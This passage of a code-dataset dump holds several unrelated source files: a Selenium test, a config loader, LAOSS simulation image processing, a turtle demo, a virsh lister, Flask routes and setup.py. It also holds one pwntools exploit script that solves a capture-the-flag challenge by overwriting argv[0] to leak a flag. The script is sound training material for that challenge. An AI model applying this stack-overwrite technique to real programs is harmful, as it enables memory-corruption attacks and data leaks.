driveType == 'chrome':\n self.cur_wd = webdriver.Chrome()\n elif driveType == 'firefox':\n self.cur_wd = webdriver.Firefox()\n else:\n raise Exception('unknow type of webdrive %s' % driveType)\n self.cur_wd.implicitly_wait(5)\n\n # 关闭浏览器\n def TearDownWebTest(self):\n self.cur_wd.quit()\n\n def LoginWebSite(self,name):\n self.cur_wd.get(self.url)\n self.cur_wd.find_element_by_css_selector('#subscribe').clear()\n self.cur_wd.find_element_by_css_selector('#subscribe').send_keys(name)\n self.cur_wd.find_element_by_css_selector('#username').send_keys('test')\n 
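# submit the join form once the channel name and username have been entered\n        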
self.cur_wd.find_element_by_css_selector('#joinButton').click()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"code/untitled1/实际项目脚本开发/chat/chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"426627672","text":"## Config: Saving Method: Dict, Json, INI\n\n\n'''\nDescription: \n This file is to be used for initializing main execution file.\nFunction this file Contains:\n - \n'''\n\n# ----------------------------------------------- Loading Libraries ----------------------------------------------- #\n# pip3 install ConfigParser\nimport configparser\nimport json,os,ast\nfrom txt0_GeneralFunc import custom_ast_lit_eval\n# from _editable_configuration_dict import config as config_dict\n\nclass ProcessConfigDict:\n \n def __init__(self, config_dict):\n self.conf_dict = config_dict\n \n @staticmethod\n def config_string_cleaner(content):\n '''\n Sometimes content are not read by ast.literal_eval hence this function sort some of \n the error to make it work\n '''\n if isinstance(content, str):\n # print('>>>>>Cleaning the string')\n things_to_remove = ['\\n']\n for ele in things_to_remove:\n content = str(content).replace(ele, ' ')\n return ' '.join([ele for ele in content.split(' ') if len(ele)>0])\n else:\n return content\n\n @staticmethod\n def check_dict_and_get_keys(variable):\n if isinstance(variable, dict):\n return True, list(variable.keys())\n else:\n return False, ProcessConfigDict.config_string_cleaner(variable)\n\n def generate_mod_dict(self):\n '''\n modifying the dictory so that it will be easy to work with json or ini \n Input: takes multi level Dict\n Output: Single Level Dictionary where keys has been concatinated with '.' as seperator\n\n Sample:\n {\n 'a': 1,\n 'b': {\n 'c': \"[1,2,3]\",\n 'd': 'asd'\n },\n 'e': 'qwerty'\n }\n\n to\n\n {\n 'a': 1,\n 'b.c': \"[1,2,3]\",\n 'b.d': 'asd',\n 'e': 'qwerty'\n }\n\n '''\n key_path, mconf_dict = [], {}\n c0 = self.check_dict_and_get_keys(self.conf_dict)\n if c0[0]:\n for k0 in c0[1]:\n key_path.append(k0)\n c1 = self.check_dict_and_get_keys(self.conf_dict[k0])\n if c1[0]:\n for k1 in c1[1]:\n key_path.append(k1)\n c2 = self.check_dict_and_get_keys(self.conf_dict[k0][k1])\n if c2[0]:\n for k2 in c2[1]:\n key_path.append(k2)\n c3 = self.check_dict_and_get_keys(self.conf_dict[k0][k1][k2])\n if c3[0]:\n for k3 in c3[1]:\n key_path.append(k3)\n c4 = self.check_dict_and_get_keys(self.conf_dict[k0][k1][k2][k3])\n if c4[0]:\n for k4 in c4[1]:\n key_path.append(k4)\n c5 = self.check_dict_and_get_keys(self.conf_dict[k0][k1][k2][k3][k4])\n if c5[0]:\n for k5 in c5[1]:\n key_path.append(k5)\n c6 = self.check_dict_and_get_keys(self.conf_dict[k0][k1][k2][k3][k4][k5])\n if c6[0]:\n for k6 in c6[1]:\n key_path.append(k6)\n c7 = self.check_dict_and_get_keys(self.conf_dict[k0][k1][k2][k3][k4][k5][k6])\n if c7[0]:\n for k7 in c7[1]:\n key_path.append(k7)\n c8 = self.check_dict_and_get_keys(self.conf_dict[k0][k1][k2][k3][k4][k5][k6][k7])\n if c8[0]:\n msg = 'Dictionary contains More than 8 Levels. 
WHich is not supported Hence Raising Error'\n raise Exception(msg)\n else:\n print('.'.join(key_path))\n mconf_dict['.'.join(key_path)] = c8[1]\n key_path.pop()\n else:\n mconf_dict['.'.join(key_path)] = c7[1]\n key_path.pop()\n else:\n mconf_dict['.'.join(key_path)] = c6[1]\n key_path.pop()\n else:\n mconf_dict['.'.join(key_path)] = c5[1]\n key_path.pop()\n else:\n mconf_dict['.'.join(key_path)] = c4[1]\n key_path.pop()\n else:\n mconf_dict['.'.join(key_path)] = c3[1]\n key_path.pop()\n else:\n mconf_dict['.'.join(key_path)] = c2[1]\n key_path.pop()\n else:\n mconf_dict['.'.join(key_path)] = c1[1]\n key_path.pop()\n else:\n mconf_dict['.'.join(key_path)] = c0[1]\n \n ## Changing the case of keys so that it matched the config_ini\n new_mod_dict = {}\n for key in mconf_dict.keys():\n new_mod_dict[key.lower()] = mconf_dict[key]\n \n self.modified_config_dict = new_mod_dict\n # return mconf_dict\n \n \n def get_original_config_dict(self):\n return self.conf_dict\n \n def get_modified_config_dict(self):\n self.generate_mod_dict()\n return self.modified_config_dict\n \n def get_config_json(self):\n '''\n if you want to reformat and save the json \n ## Validate the Json at https://jsonlint.com/\n '''\n print('https://jsonlint.com/')\n self.generate_mod_dict()\n #print(json.dumps(self.modified_config_dict))\n return json.dumps(self.modified_config_dict)\n \n def write_json_config(self, loc = '../config/configuration_json.json'):\n '''\n get the modified_config_dict and write a json config file \n '''\n if os.path.exists('/'.join(loc.split('/')[:-1])):\n self.generate_mod_dict()\n json.dump(self.modified_config_dict, open(loc, 'w'))\n else:\n raise Exception('Provided path doesn\\'t exist.')\n \n def write_ini_config(self, loc = '../config/configuration_ini.ini'):\n '''\n get the modified_config_dict and write a json config file \n '''\n if os.path.exists('/'.join(loc.split('/')[:-1])):\n self.generate_mod_dict()\n\n parser = configparser.ConfigParser()\n parser.add_section('config')\n for key in self.modified_config_dict.keys():\n parser.set('config', key, self.modified_config_dict[key])\n parser.write(open(loc, 'w'))\n else:\n raise Exception('Provided path doesn\\'t exist.')\n #for section in config.keys():\n # parser.add_section(section)\n # for key in config[section].keys():\n # parser.set(section, key, str(config[section][key]))\n\n# config_instance = ProcessConfigDict(config_dict)\n# # config_instance.get_original_config_dict()\n# # config_instance.get_modified_config_dict()\n# # print(config_instance.get_config_json())\n# config_instance.write_json_config()\n# config_instance.write_ini_config()\n\n\n\nclass Configuration:\n '''\n Get a list containing the location of the config files (py/json/ini) read the content\n and convert the content to dictionary and make the content available to be accessed\n \n ## https://realpython.com/instance-class-and-static-methods-demystified/\n '''\n \n def __init__(self, config_file_paths_li=['../config/configuration_json.json'], \n raise_key_not_found_Error=True, try_using_ast = True):\n for ele in config_file_paths_li:\n if os.path.exists(ele) is False:\n raise exception('THIS PATH \"{}\" DOES\\'T EXIST'.format(ele))\n self.config_file_paths_li = config_file_paths_li\n self.raise_key_not_found_Error = raise_key_not_found_Error\n self.try_using_ast = try_using_ast\n # self._config = config # set it to conf\n \n \n @staticmethod\n def _load_ini_file(path):\n ''' \n load single ini config file \n ----> dictionary is not well structure when the file is 
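# generate_mod_dict above flattens a nested dict by hard-coding eight nesting
# levels of if-statements. A minimal recursive sketch of the same flattening
# (keys joined with '.' and lowered, matching the record's ini-reader case
# handling) that works for arbitrary depth:
def flatten_dict(d, parent_key=""):
    flat = {}
    for key, value in d.items():
        path = f"{parent_key}.{key}" if parent_key else str(key)
        if isinstance(value, dict):
            flat.update(flatten_dict(value, path))  # recurse into nested dicts
        else:
            flat[path.lower()] = value
    return flat

print(flatten_dict({'a': 1, 'b': {'c': "[1,2,3]", 'd': 'asd'}, 'e': 'qwerty'}))
# {'a': 1, 'b.c': "[1,2,3]", 'b.d': 'asd', 'e': 'qwerty'}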
having multiple nested dict\n '''\n temp_dict = {}\n config = configparser.ConfigParser()\n config.read(path)\n for section in config.sections():\n temp_dict[section] = dict(config[section])\n\n return temp_dict['config']\n \n \n @staticmethod\n def _load_json_file(path):\n ''' load single json config file\n '''\n return json.load(open(path))\n \n \"\"\"\n @staticmethod\n def load_dict_file(path):\n ''' load single python config file containing dictionary\n ## Link: https://chrisyeh96.github.io/2017/08/08/definitive-guide-python-imports.html\n # from config.configuration_dict import config\n \n ##https://stackoverflow.com/questions/2220699/whats-the-difference-between-eval-exec-and-compile\n '''\n with open(path) as file:\n exec(compile(file.read(), '', 'exec'))\n return config\n \"\"\"\n \n \n def load_config_files(self):\n '''\n Loading the files provided in the file path list; raise error if some issue is there\n '''\n all_config_dict = {}\n \n print('\\nNote:\\tWhen multiple configuration files will be provided and they might have some duplicate keys\\\n \\n\\tthen then the priority to the config will be provided to the one configwhich was provided\\\n \\n\\tat the start of the \"config_file_paths_li\".\\n')\n \n for path in self.config_file_paths_li[::-1]: ## reversing the list so that the first element can be given more priority\n if os.path.exists(path):\n file_type = path.split('.')[-1]\n # if 'py' == file_type:\n # temp_conf = load_dict_file(path)\n if 'json' == file_type:\n temp_conf = Configuration._load_json_file(path)\n elif 'ini' == file_type:\n temp_conf = Configuration._load_ini_file(path)\n else:\n raise Exception('Config file format not defined')\n \n if isinstance(temp_conf, dict):\n for key in temp_conf.keys():\n all_config_dict[key] = temp_conf[key]\n else:\n print('File Path Doesn\\'t exist')\n \n self._config = all_config_dict\n \n \n def get_config(self, *which_property):\n '''\n if raise_key_not_found_Error == False i.e. key is not present in config then returns None\n '''\n #self._load_config_files()\n config_prop = '.'.join([ ele.lower() for ele in which_property])\n \n if config_prop in list(self._config.keys()):\n if self.try_using_ast:\n try:\n custom_ast_lit_eval(self._config[config_prop])\n except SyntaxError:\n return self._config[config_prop]\n pass#print('Syntax Error. 
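# A minimal configparser round-trip sketch matching the single-'config'-section
# layout written by write_ini_config above; values come back as strings, which is
# why the reader later re-evaluates them (the file name here is illustrative):
import configparser

parser = configparser.ConfigParser()
parser.add_section('config')
parser.set('config', 'paths.raw_training_data_file', '../data/raw.csv')
with open('configuration_ini.ini', 'w') as f:
    parser.write(f)

reader = configparser.ConfigParser()
reader.read('configuration_ini.ini')
print(dict(reader['config']))  # {'paths.raw_training_data_file': '../data/raw.csv'}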
Therefore can\\'t return the value')\n else:\n return self._config[config_prop]\n else:\n msg = 'Key path Exception: NO property is present at this path: \\n\\t\\t{}'.format('> '+config_prop)\n print(msg)\n if self.raise_key_not_found_Error:\n raise Exception(msg)\n else:\n return None\n # ## When It was initailly nested dictionaries\n # which_property, traversed_path = self._config, []\n # for prop in list(which_property):\n # traversed_path.append(prop)\n # if prop in prop_to_return.keys():\n # prop_to_return = prop_to_return[prop]\n # else:\n # msg = 'Key path Exception: NO property is present at this path: \\n\\t\\t{}'.format('> '+'\\\\'.join(traversed_path))\n # print(msg)\n # if self.raise_key_not_found_Error:\n # raise Exception(msg)\n # else:\n # return None\n # return prop_to_return\n \n def get_keys_in_config(self):\n '''\n Return all the keys that are present in the config file\n '''\n #self._load_config_files()\n return list(self._config.keys())\n\n\n# conf = Configuration(raise_key_not_found_Error=True)\n# print(conf.get_keys_in_config())\n# conf.get_config('paths', 'raw_training_data_file')\n\n\n\n#-------------------------------------------------------\n\n# from AML00_GetConfig import ProcessConfigDict, Configuration\n# from _editable_configuration_dict import config as config_dict\n\n# stillworkingwithconfig = True\n# if stillworkingwithconfig:\n# config_instance = ProcessConfigDict(config_dict)\n# # config_instance.get_original_config_dict()\n# # config_instance.get_modified_config_dict()\n# # print(config_instance.get_config_json())\n# config_instance.write_json_config()\n# config_instance.write_ini_config()\n\n# conf = Configuration(['../config/configuration_json.json'], True,True)\n# conf.load_config_files()\n# #print(conf.get_keys_in_config())\n# conf.get_config('paths', 'raw_training_data_file')\n\n\n\n\n\n\n# def GetConfig(X, Y, msg = False):\n# '''\n# To get config value from config.ini Basic or Advance, config.ini is expected to have 2D structure\n# config_li <-- is a global list containing multiple config files.\n# No Error is raised when X == Config\n# msg == True: print execution messages\n# '''\n# val = []\n# # print(self.config_li)\n# # for conf in self.config_li:\n# # print(config_li)\n# for conf in config_li:\n# try:\n# val.append(conf[X][Y])\n# if msg is True: print('Using', conf['Config']['Type'], 'config, specificallly the pair ', X, Y)\n# except:\n# # print('NoVal')\n# pass\n# if X != 'Config':\n# if len(val) == 0: \n# raise Exception('configuration value NOT present in any file.')\n# elif len(val) > 1: \n# raise Exception('configuration value present in MULTIPLE file.')\n# else:\n# return val[0] ## first element in the list i.e. the value\n# return val ## used Just to return value when X=Config is used \n\n# # if __name__ == '__main':\n \n# # config_bas = configparser.ConfigParser()\n# # config_adv = configparser.ConfigParser()\n# # try:\n# # config_bas.read('../config/AAT_Config(basic).ini')\n# # config_adv.read('../config/AAT_Config(advance).ini')\n# # config_li = [config_adv, config_bas]\n# # print('Successfully read the configuration files :', GetConfig('Config', 'Type'))\n# # except:\n# # print('Unable to read config files. 
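# ast.literal_eval sketch (custom_ast_lit_eval in get_config above is assumed to
# behave similarly): it evaluates Python literals stored as strings, so list and
# numeric values survive the string-only ini/json round trip, while non-literal
# input raises instead of executing code.
import ast

print(ast.literal_eval("[1, 2, 3]"))  # [1, 2, 3]
print(ast.literal_eval("{'a': 1}"))   # {'a': 1}
try:
    ast.literal_eval("__import__('os')")
except (ValueError, SyntaxError) as err:
    print(type(err).__name__)  # ValueError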
Hence Exiting.')\n# # sys.exit(1)","sub_path":"TwitterSentimentalAnalysis-master/bin/AML00_GetConfig.py","file_name":"AML00_GetConfig.py","file_ext":"py","file_size_in_byte":16374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"400344091","text":"import pandas as pd\nimport os\nimport numpy as np\nimport subprocess\nimport cv2\n\nfrom data_generation.lib.image_processing import post_process_image\n\n\n\nclass LaossResult():\n\n def __init__(self, path, laoss_tool_path=None,noise_folder = r\"/data/batg/noise_samples\"):\n self.path = path\n self.laoss_tool_path = laoss_tool_path\n self.noise_folder = noise_folder\n self.index = int(self.path.split('image')[-1])\n\n def rename_output(self, name):\n if '.Potential' in name:\n return 'v'\n elif '.ACPotential' in name:\n return 'dv'\n elif 'ShortCircuitCurrent' in name:\n return 'isc'\n elif 'Source Current' in name:\n return 'i'\n elif 'Wavelength' in name:\n return 'isc'\n else:\n return name\n\n\n def load_sweeps(self):\n # print(os.path.join(self.path, 'result'))\n with open(os.path.join(self.path, 'result', 'sweepdirmapping.txt')) as f:\n n_sweep = sum(1 for _ in f) - 1\n # try:\n if os.path.exists(os.path.join(self.path, 'result', 'sweepResult.txt')):\n self.data = pd.read_csv(os.path.join(self.path, 'result', 'sweepResult.txt'), delimiter='\\t', skiprows=4,\n header=0, nrows=n_sweep, usecols=[0,1, 2,3])\n self.data.rename(mapper=self.rename_output, axis='columns', inplace=True)\n\n self.data['i'] = self.data['i'] / (0.02 * 0.018)\n\n # print(self.data['i'])\n if 'isc' not in self.data.columns:\n self.data['isc'] = 0.0\n self.data['p'] = -self.data['i'] * self.data['v']\n self.data['sweep'] = pd.Series(dtype=np.float64)\n\n self.run_data = pd.read_csv(os.path.join(self.path, '.', 'Parameters.csv')).iloc[0]\n\n self.sweep_mapping = pd.read_csv(os.path.join(self.path, 'result', 'sweepdirmapping.txt'),\n delimiter='\\t').set_index('Path')\n self.sweep_mapping.rename(mapper=self.rename_output, axis='columns', inplace=True)\n for index, row in self.sweep_mapping.iterrows():\n index_filter = [True] * len(self.data)\n for value in self.sweep_mapping.columns:\n index_filter = index_filter & (np.isclose(self.data[value], row[value], atol=1e-4))\n self.data.loc[index_filter, 'sweep'] = index\n\n def run_laoss_tool(self,force_processing=False):\n\n for index, row in self.sweep_mapping.iterrows():\n\n sweep_results_folder = index\n i = sweep_results_folder.split('_')[1]\n if (not os.path.exists(os.path.join(self.path, \"current\" + str(i) + \".txt\")) and not os.path.exists(os.path.join(self.path, \"image\" + str(i) + \".npy\"))) or force_processing:\n output = subprocess.check_output(\n [self.laoss_tool_path, \"-p\", os.path.join(self.path, \"result\"), \"-o\",\n \"current\" + str(i) + \".txt\",\n \"-r\", str(sweep_results_folder),\n \"-n\", \"Luminance Iteration 0\", \"-e\", \"top\"\n , \"-t\", \"text\", \"--resolution\", \"800\"],\n cwd=self.path, stderr=subprocess.STDOUT).decode()\n\n if (not os.path.exists(os.path.join(self.path, \"potential\" + str(i) + \".txt\")) and not os.path.exists(os.path.join(self.path, \"image\" + str(i) + \".npy\"))) or force_processing:\n output = subprocess.check_output(\n [self.laoss_tool_path, \"-p\", os.path.join(self.path, \"result\"), \"-o\",\n \"potential\" + str(i) + \".txt\",\n \"-r\", str(sweep_results_folder),\n \"-n\", \"Potential_0 Iteration 0\", \"-e\", \"top\"\n , \"-t\", \"text\", \"--resolution\", \"800\"],\n cwd=self.path, 
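# Sketch of the sweep-matching idea in load_sweeps above: rows are matched to a
# sweep by tolerant float comparison (np.isclose with atol), because exact ==
# on floats parsed from text output is unreliable. The data below is illustrative.
import numpy as np
import pandas as pd

data = pd.DataFrame({'v': [0.5500001, 0.65], 'isc': [0.0, 0.0]})
mask = np.isclose(data['v'], 0.55, atol=1e-4) & np.isclose(data['isc'], 0.0, atol=1e-4)
print(data[mask])  # only the first row matches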
stderr=subprocess.STDOUT).decode()\n\n try:\n output = subprocess.check_output(\n [self.laoss_tool_path, \"-p\", os.path.join(self.path, \"result\"), \"-o\",\n \"temperature\" + str(i) + \".txt\",\n \"-r\", str(sweep_results_folder),\n \"-n\", \"Temperature_0 Iteration 0\", \"-e\", \"top\"\n , \"-t\", \"text\", \"--resolution\", \"800\"],\n cwd=self.path, stderr=subprocess.STDOUT).decode()\n except:\n pass\n\n def pre_process_export_images(self, blur=1, noise_factor=0,image_dim=(100, 90),force_processing=False):\n for index, row in self.sweep_mapping.iterrows():\n sweep_results_folder = index\n i = sweep_results_folder.split('_')[1]\n if not os.path.exists(os.path.join(self.path, \"image\" + str(i) + \".npy\")) or force_processing:\n\n\n current = np.genfromtxt(os.path.join(self.path, \"current\" + str(i) + \".txt\"))\n potential = np.genfromtxt(os.path.join(self.path, \"potential\" + str(i) + \".txt\"))\n\n u_junc = potential - (current - potential * self.run_data['rho_par_0']) * self.run_data[\n 'r_int_0'] * 0.0001\n luminance = np.exp(u_junc / self.run_data['ideality_factor'] / 0.0238)\n luminance[current == 0] = 0\n luminance = cv2.resize(luminance, (500, 450),interpolation=cv2.INTER_AREA)\n luminance = post_process_image(self.noise_folder,luminance,blur=blur,factor=noise_factor)\n luminance = cv2.resize(luminance, image_dim,interpolation=cv2.INTER_AREA)\n np.save(os.path.join(self.path, \"image\" + str(i) + \".npy\"), luminance)\n try:\n temperature = np.genfromtxt(os.path.join(self.path, \"temperature\" + str(i) + \".txt\"))\n temperature = cv2.resize(temperature, (500, 450),interpolation=cv2.INTER_AREA)\n temperature = cv2.resize(temperature, image_dim,interpolation=cv2.INTER_AREA)\n np.save(os.path.join(self.path, \"image_th\" + str(i) + \".npy\"), temperature)\n except:\n pass\n if os.path.exists(os.path.join(self.path, \"current\" + str(i) + \".txt\")):\n os.remove(os.path.join(self.path, \"current\" + str(i) + \".txt\"))\n\n if os.path.exists(os.path.join(self.path, \"potential\" + str(i) + \".txt\")):\n os.remove(os.path.join(self.path, \"potential\" + str(i) + \".txt\"))\n\n if os.path.exists(os.path.join(self.path, \"temperature\" + str(i) + \".txt\")):\n os.remove(os.path.join(self.path, \"temperature\" + str(i) + \".txt\"))\n\n def get_export_image(self, image_size=(60, 70), v1=0.55, v2=0.65, blur=5, factor=14364764):\n full_image = []\n\n img1 = cv2.resize(self.get_image(v=v1), (500, 450))\n img1noise = post_process_image(self.noise_folder,img1, blur=blur, factor=factor) # 14272973\n img_norm = np.log(img1noise / np.mean(np.mean(img1noise))) * 0.0238 + v1\n img1re = cv2.resize(img_norm, image_size).astype(np.float32)\n # [:40,20:40]\n\n img2 = cv2.resize(self.get_image(v=v2), (500, 450))\n img2 = post_process_image(self.noise_folder,img2, blur=blur, factor=factor) # 14272973\n # img2 = img2/np.mean(np.mean(img1)) + gauss/np.mean(np.mean(img1))*np.mean(np.mean(img2))\n img2 = np.log(img2 / np.mean(np.mean(img1))) * 0.0238 + v1\n\n img2 = cv2.resize(img2, image_size).astype(np.float32)\n\n if np.count_nonzero(np.isnan(img1re)) == 0 and np.count_nonzero(np.isnan(img2)) == 0:\n full_image.append(img1re.reshape(image_size[1], image_size[0], 1).tolist())\n full_image.append(img2.reshape(image_size[1], image_size[0], 1).tolist()) # [:40,20:40]\n\n return full_image\n else:\n return None\n\n\n def get_image(self, v, isc=0):\n\n try:\n image1str = str(\n self.data[np.isclose(self.data['isc'], isc, atol=1e-4) & np.isclose(self.data['v'], v, atol=1e-4)][\n 
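# Sketch of the luminance model in pre_process_export_images above: junction
# voltage maps to luminance through an exponential diode-style law,
# L ~ exp(U / (n * V_T)) with thermal voltage V_T ~= 0.0238 V, and zero-current
# regions are masked to zero. The values below are illustrative.
import numpy as np

u_junc = np.array([[0.55, 0.56], [0.54, 0.0]])
current = np.array([[1.0, 1.0], [1.0, 0.0]])
ideality_factor = 1.5
luminance = np.exp(u_junc / ideality_factor / 0.0238)
luminance[current == 0] = 0  # no current, no emission
print(luminance)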
'sweep'].to_list()[0]).split('_')[1]\n except:\n print(1)\n image1 = np.load(os.path.join(self.path, \"image\" + str(image1str) + \".npy\"))\n return image1\n\n\n\n\n","sub_path":"data_generation/lib/laoss_results.py","file_name":"laoss_results.py","file_ext":"py","file_size_in_byte":8210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"553338918","text":"# import libraries\nimport turtle\n\n# create turtle drawing palette\nt = turtle.Pen()\n\n# define function to draw shape\ndef draw_shape():\n\n # calculate start position\n start_x = x - (size/2)\n start_y = y - (size/2)\n\n # set pen up\n t.penup()\n\n # move to start position\n t.goto(start_x, start_y)\n\n # draw shape\n t.pendown()\n t.setheading(0)\n for i in range(sides):\n t.forward(size)\n t.left(360/sides)\n\n# open file\nfh = open(\"file.txt\", 'r')\n\n# read the lines\nrecords = fh.readlines()\n\n# using a for loop, break each line down\nfor record in records:\n\n # get rid of the trailing \\n at the end of the file\n record = record.strip()\n\n # split the line into the parts\n x, y, sides, size = record.split(',')\n\n #turn integers back into integers\n x = int(x)\n y = int(y)\n sides = int(sides)\n size = int(size)\n\n # draw shape\n draw_shape()\n\nfh.close()\n","sub_path":"demos/file_io/turtle_driver/shapes.py","file_name":"shapes.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"267723399","text":"#!/usr/bin/python2\n# Source: https://bannsecurity.com/index.php/home/10-ctf-writeups/39-seccon-2016-checker\n\nfrom pwn import *\n\nelf = ELF(\"checker\")\n\np = process(\"checker\")\n#p = remote(\"checker.pwn.seccon.jp\",14726)\n\np.recvuntil(\"NAME : \")\np.sendline(\"Blerg\") # This doesn't matter\n\n# Adjust as necessary\nargv0_off = 376\n\n# Zero out argv[0]\nfor i in range(8):\n p.recvuntil(\">> \")\n p.sendline(\"A\"*(argv0_off+8-i))\n\n# Now we can say yes\np.sendline(\"yes\")\n\n\n# Send the address of the flag to argv[0] to have the error message leak the flag for us.\np.sendline(cyclic(argv0_off,n=8) + p64(elf.symbols['flag']))\n\np.interactive()\n","sub_path":"challenges/random_seccon2016_checker/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"481603520","text":"import os\noutput=os.popen(\"virsh list --all\").readlines()\ndef list_machines(vm_list=None):\n machines=dict()\n if input:\n vm_list=vm_list[2:]\n for machine_string in vm_list:\n machine_line_splitted = machine_string.split()\n if len(machine_line_splitted) > 0:\n vm_name=machine_line_splitted[1]\n machine_status = \"\"\n for status in machine_line_splitted[2:]:\n machine_status += status\n machines[vm_name]=dict()\n machines[vm_name]['status']=machine_status\n return machines\n\ndef list_interfaces(machine):\n output=os.popen(\"virsh domiflist %s\" % ( machine) ).readlines()\n interfaces_list=output[2:]\n interfaces = list()\n for interface_line in interfaces_list:\n interface = interface_line.split()\n if len(interface) > 0: # we have a line, it's not an empty line\n interface_name=interface[0]\n interface_mac=interface[4]\n interfaces.append([interface_name,interface_mac])\n return interfaces\n\n\nmachines=list_machines(output)\nfor machine in machines.keys():\n interface = list_interfaces(machine)\n machines[machine]['network']=interface\n\nfor machine in machines:\n 
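# os.popen, used in list_machines.py above, discards the exit status; a sketch of
# the same call via subprocess, which exposes the return code and avoids a shell
# (virsh must be on PATH for this to actually run):
import subprocess

result = subprocess.run(["virsh", "list", "--all"], capture_output=True, text=True)
if result.returncode == 0:
    machine_lines = result.stdout.splitlines()[2:]  # skip the two header lines
    print(machine_lines)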
print(\"%-20s is %-5s with Network device %-5s and network mac %s\" % (machine,machines[machine]['status'],\n machines[machine]['network'][0][0],machines[machine]['network'][0][1]))\n","sub_path":"python/list_machines.py","file_name":"list_machines.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"577475990","text":"from flask import jsonify, request, session\n\nimport os, shutil\n\nfrom server import app\nfrom server.database import *\nfrom server.utils import list_access, list_owner, login_required, has_json\n\n# MARK: List routes\n@app.route('/api/lists', methods=['GET'])\n@login_required\ndef get_lists():\n response = {}\n response['lists'] = [l.__dict__ for l in db_get_lists(session.get('userID'))]\n return jsonify(response)\n\n\n@app.route('/api/lists/', methods=['GET'])\n@login_required\n@list_access\ndef get_list(list_id):\n ''' returns the specified list'''\n l = db_get_list(list_id)\n if l == None:\n json_abort(404, \"List not found\")\n return jsonify(l.__dict__)\n\n\n@app.route('/api/lists/', methods=['POST'])\n@login_required\n@has_json\ndef create_list():\n ''' creates a new list '''\n data = request.get_json()\n title = data.get('title')\n\n newList = db_create_list(title, session.get('userID'))\n if newList == None:\n json_abort(500, 'Could not create list')\n\n return jsonify(newList.__dict__), 201\n\n\n@app.route('/api/lists/', methods=['PUT'])\n@login_required\n@list_owner\n@has_json\ndef update_list(list_id):\n l = db_get_list(list_id)\n data = request.get_json()\n\n #Only update if revision is smaller on the server\n if data.get('revision') != None and data.get('revision') < l.revision:\n json_abort(409, 'Newer version of list available')\n\n l.title = (data.get('title'))\n l.revision = l.revision + 1\n\n l = db_update_list(l)\n if l == None:\n json_abort(500, 'Could not update list')\n\n return jsonify(l.__dict__)\n\n\n@app.route('/api/lists/', methods=['DELETE'])\n@login_required\n@list_owner\ndef remove_list(list_id):\n db_delete_list(list_id)\n\n # delete upload file directory\n directory = os.path.join(app.config['UPLOAD_FOLDER'], list_id)\n shutil.rmtree(directory, ignore_errors=True)\n\n return jsonify({'result': True})\n","sub_path":"solutions/server/server-14-login-logout-user/server/routes/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"295873436","text":"#!/usr/bin/env python\nfrom setuptools import find_packages, setup\n\nproject = \"microcosm_pubsub\"\nversion = \"0.8.0\"\n\nsetup(\n name=project,\n version=version,\n description=\"PubSub with SNS/SQS\",\n author=\"Globality Engineering\",\n author_email=\"engineering@globality.com\",\n url=\"https://github.com/globality-corp/microcosm-pubsub\",\n packages=find_packages(exclude=[\"*.tests\", \"*.tests.*\", \"tests.*\", \"tests\"]),\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n \"boto3>=1.3.0\",\n \"marshmallow>=2.6.1\",\n \"microcosm>=0.7.0\",\n \"microcosm-daemon>=0.2.0\",\n ],\n setup_requires=[\n \"nose>=1.3.6\",\n ],\n dependency_links=[\n ],\n entry_points={\n \"console_scripts\": [\n \"sns-produce = microcosm_pubsub.main:produce\",\n \"sqs-consume = microcosm_pubsub.main:consume\",\n \"simple-daemon = microcosm_pubsub.main:main\",\n ],\n \"microcosm.factories\": [\n \"pubsub_message_codecs = microcosm_pubsub.codecs:configure_pubsub_message_codecs\",\n 
\"sqs_consumer = microcosm_pubsub.consumer:configure_sqs_consumer\",\n \"sqs_message_dispatcher = microcosm_pubsub.dispatcher:configure_sqs_message_dispatcher\",\n \"sns_producer = microcosm_pubsub.producer:configure_sns_producer\",\n \"sns_topic_arns = microcosm_pubsub.producer:configure_sns_topic_arns\",\n ]\n },\n tests_require=[\n \"coverage>=3.7.1\",\n \"mock>=1.0.1\",\n \"PyHamcrest>=1.8.5\",\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"613658978","text":"from threading import Thread, Event\nimport os\nimport numpy as np\nfrom pysndfile import PySndfile, sndio\nfrom random import randint, shuffle\nfrom shutil import copyfile\nfrom natsort import natsorted\nimport numpy as np\nimport pandas as pd\nfrom shutil import copy2\n\nfrom test_base import BaseThread\n\nfrom matrix_test.helper_modules.signalops import play_wav\nfrom matrix_test.helper_modules.filesystem import globDir\nfrom scipy.special import logit\nfrom config import socketio\nimport csv\nimport pdb\nimport dill\n\nimport sounddevice as sd\nfrom hearing_loss_sim import apply_hearing_loss_sim\n\nsymb_dict = {\n True: 10003,\n False: 10007\n}\n\ndef set_trace():\n import logging\n log = logging.getLogger('werkzeug')\n log.setLevel(logging.ERROR)\n log = logging.getLogger('engineio')\n log.setLevel(logging.ERROR)\n pdb.set_trace()\n\n\nclass EEGStoryTrainThread(BaseThread):\n '''\n Thread for running server side matrix test operations\n '''\n def __init__(self, sessionFilepath=None,\n stimFolder='./eeg_story_stim/stimulus/', nTrials=2,\n socketio=None, participant=None, srt_50=None, s_50=None):\n self.test_name = 'eeg_story_train'\n self.stimDir = stimFolder\n self.nTrials = nTrials\n self.trial_ind = 0\n\n self.participant = participant\n self.participant_parameters = self.participant.parameters\n\n self.selected_q = []\n self.question = []\n self.answers = [''] * 8\n self.wav_files = []\n self.q_files = []\n\n 